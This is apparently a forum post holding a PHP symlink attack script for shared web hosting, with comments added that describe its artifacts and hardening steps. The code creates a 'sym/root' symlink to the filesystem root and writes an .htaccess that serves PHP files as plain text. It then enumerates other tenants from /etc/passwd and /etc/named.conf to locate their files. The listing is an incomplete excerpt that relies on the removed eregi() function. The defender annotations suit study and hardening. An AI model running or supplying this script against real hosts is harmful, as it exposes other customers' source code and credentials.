
Locked SymLink [Private]


sQuo


[LENGUAJE=php]<?phpif(php_sapi_name() != 'cli'){
/*
 * Shared-hosting symlink probe; annotated for defenders (detection and hardening).
 *
 * What the listing does, in order:
 *   1. Runs only under a non-CLI SAPI, i.e. when invoked through the web server.
 *   2. Builds a per-account path template by replacing the current user's name
 *      (get_current_user()) inside $script with the marker "[%user%]".
 *   3. Creates ./sym/, writes sym/.htaccess and creates the link sym/root -> "/".
 *   4. Reads account names from /etc/named.conf (plus /etc/valiases ownership) and
 *      from /etc/passwd, then checks whether the templated path exists per account.
 *
 * NOTE(review): $script, $url and $scripts are read but never assigned in this
 * listing, so the post is an incomplete excerpt.
 * NOTE(review): eregi() no longer exists in PHP 7 and later, so the code as posted
 * is aimed at legacy PHP 5 hosts.
 *
 * Artifacts to hunt for (all taken from the code below): a directory named "sym"
 * under a web root, a symlink "sym/root" whose target is "/", a "sym/.htaccess"
 * containing "DirectoryIndex Sux.html" and "AddType text/plain .php", and response
 * bodies carrying the "[*] ..." status strings.
 *
 * Hardening that removes the precondition: do not let tenants set Options from
 * .htaccess (restrict AllowOverride), prefer SymLinksIfOwnerMatch over
 * FollowSymLinks (Apache documents it as race-prone, so treat it as defence in
 * depth, not a boundary), confine PHP with open_basedir and disable_functions,
 * keep home directories unreadable to other accounts, and isolate tenants with
 * per-user filesystem views where the platform offers them.
 */
 if (strpos($script, get_current_user()) !== false) { $scriptp = explode("/", $script); $urlp = explode("/", $url); if($script[strlen($script)-1] == "/"){ $script = substr($script, 0, -1); } if($url[strlen($url)-1] == "/"){ $url = substr($url, 0, -1); } $url1 = $url; if($scriptp[count($scriptp)-1] != $urlp[count($urlp)-1]){ $script = substr($script, 0, -1*strlen($scriptp[count($scriptp)-1])); $url1 = str_replace($scriptp[count($scriptp)-1], "", $url1); $scriptp = explode("/", $script); } else { $url1 = str_replace($urlp[count($urlp)-1], "", $url1); } if($url1[strlen($url1)-1] == "/"){ $url1 = substr($url1, 0, -1); } $url1 = "http://".$_SERVER['HTTP_HOST'].$url1."/sym/root/"; $script = str_replace($url, "", $script); $script = str_replace(get_current_user(), "[%user%]", $script); echo "[*] Detected path template: $script

";
// Artifact creation. The only gate is that /etc/named.conf or /etc/passwd is
// readable by the PHP process; the return values of mkdir(), fopen() and symlink()
// are suppressed or ignored, so the "Symlink Vulnerable" message below is NOT
// evidence that the web server actually followed the link.
// The .htaccess written here turns on all Options for the directory (which includes
// following symlinks) and maps .php/.html to text/plain, so files reached through
// the link would be returned as source instead of being executed. "Require None" /
// "Satisfy Any" look intended to drop inherited access restrictions -- confirm
// against the Apache version in use.
// The directory is requested with mode 0777 (subject to umask).
if(@file("/etc/named.conf") || @file('/etc/passwd')){ @mkdir('sym', 0777); $htaccessC = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $htaccessFH = @fopen ('sym/.htaccess', 'w'); fwrite($htaccessFH ,$htaccessC); @symlink('/', 'sym/root'); echo "[*] Symlink Vulnerable

"; echo "[*] Symlink opened: $url1

"; if(@file("/etc/named.conf")){ echo "[*] /etc/named.conf Detected

";
// Enumeration source 1: every line of /etc/named.conf containing "zone" yields a
// domain name; the owner of /etc/valiases/<domain> is resolved to an account name
// with posix_getpwuid() (presumably a cPanel-style layout -- verify on the host).
// Each account name is substituted into the path template and tested with
// file_exists() through ./sym/root/. A world-readable named.conf and valiases
// directory is what makes this domain-to-account mapping possible.
$data = @file('/etc/named.conf'); foreach($data as $line){ if(eregi('zone',$line)){ preg_match_all('#zone "(.*)"#',$line,$username); flush(); if(strlen(trim($username[1][0])) >2){ $owner = posix_getpwuid(@fileowner('/etc/valiases/'.$username[1][0])); $owner = $owner['name']; $domain = $username[1][0]; if(file_exists("./sym/root/".str_replace("[%user%]", $owner, $script))){ echo "[*] Found [$domain] : ".str_replace("[%user%]", $owner, $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found [$domain] : ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } else { echo "[*] Not Found [$domain] : ".str_replace("[%user%]", $owner, $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found [$domain] : ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } flush(); } } } } else { echo "[*] /etc/named.conf Not Detected

"; } if(@file("/etc/passwd")){ echo "[*] /etc/passwd Detected

";
// Enumeration source 2: the first colon-separated field of each /etc/passwd line
// is used as the account name and run through the same template-and-file_exists()
// check. The existence test alone leaks which accounts hold the probed path, so
// other tenants' directories should not be traversable by this process at all.
$data = file("/etc/passwd"); foreach($data as $line){ if (strpos($line, ":") !== false) { $line = explode(":", $line); if(file_exists("./sym/root/".str_replace("[%user%]", $line[0], $script))){ echo "[*] Found: ".str_replace("[%user%]", $line[0], $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found: ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } else { echo "[*] Not Found: ".str_replace("[%user%]", $line[0], $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found: ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } } } } else { echo "[*] /etc/passwd Not Detected

"; } } else { echo "[*] Symlink Not Vulnerable

"; } } else { echo "[*] Username not detected in path

"; }}else{ echo "[*] This script does not work in console";}?>[/LENGUAJE]
